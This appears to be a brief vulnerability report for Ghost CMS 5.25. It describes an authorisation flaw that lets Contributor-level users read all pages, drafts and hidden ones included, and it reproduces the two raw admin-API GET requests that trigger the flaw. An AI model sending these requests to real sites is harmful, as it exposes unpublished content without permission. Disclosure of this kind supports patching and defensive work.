Vulnerable API endpoint: /ghost/api/admin/pages/
The user with the Contributor privileges is able to view created pages including draft or hidden ones.
HTTP Request to get all pages
GET /ghost/api/admin/pages/ HTTP/1.1
Host: [GHOST_HOST]
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
X-Ghost-Version: 5.25
App-Pragma: no-cache
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Content-Type: application/json; charset=UTF-8
Referer: http://gege:2368/ghost/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: ghost-admin-api-session=s%3AMBZT[SNIPPED_COOKIE]oN%2BzIU
Connection: close
HTTP Request to get a specific page
GET /ghost/api/admin/pages/[:pageId] HTTP/1.1
Host: [GHOST_HOST]
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
X-Ghost-Version: 5.25
App-Pragma: no-cache
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Content-Type: application/json; charset=UTF-8
Referer: http://gege:2368/ghost/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: ghost-admin-api-session=s%3AMBZT[SNIPPED_COOKIE]oN%2BzIU
Connection: close